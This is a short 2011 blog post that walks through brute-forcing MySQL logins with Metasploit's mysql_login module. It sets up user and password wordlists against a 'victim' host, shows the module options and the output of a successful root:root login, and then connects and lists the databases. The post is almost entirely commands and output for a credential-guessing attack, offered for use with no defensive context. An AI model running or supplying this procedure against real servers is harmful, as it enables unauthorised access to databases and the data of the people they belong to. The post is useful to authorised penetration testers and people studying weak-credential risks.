penguintengil: BruteForce Mysql using Metasploit

#open port 3306 ( mysql ) in victim
#create file ex.PASS.txt that contain many password
#create file ex.USERS.txt that contain many users
here we go .........................................................................
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1   //example
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) >show options

Module options:



Name              Current Setting     Required  Description

----              ---------------     --------  -----------

BLANK_PASSWORDS   true                yes       Try blank passwords  for all users

BRUTEFORCE_SPEED  5                   yes       How fast to  bruteforce, from 0 to 5

PASSWORD                              no        A specific password  to authenticate with

PASS_FILE         /root/pass.txt  no        File containing  passwords, one per line

RHOSTS 127.0.0.1        yes       The target address  range or CIDR identifier

RPORT             3306                yes       The target port

STOP_ON_SUCCESS   false               yes       Stop guessing when a  credential works for a host

THREADS           1                   yes       The number of  concurrent threads

USERNAME                              no        A specific username  to authenticate as

USERPASS_FILE                         no        File containing users  and passwords separated by space, one pair per line

USER_FILE         /root/users.txt     no        File containing  usernames, one per line

VERBOSE           true                yes       Whether to print  output for all attempts

msf auxiliary(mysql_login) > exploit
[*] 127.0.0.1:3306 - Found remote MySQL version 5.1.41
[*] 127.0.0.1:3306 Trying username:'admin' with password:''
[*] 127.0.0.1:3306 failed to login as 'admin' with password ''
[*] 127.0.0.1:3306 Trying username:'root' with password:"
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'root' : 'root'

********************************************************************************
# mysql -h 127.0.0.1 -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version:
version: 5.1.41-3ubuntu12 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
+--------------------+
2 rows in set (0.01 sec)
mysql>

./finished

penguintengil

Sunday, January 16, 2011

BruteForce Mysql using Metasploit

No comments:

Post a Comment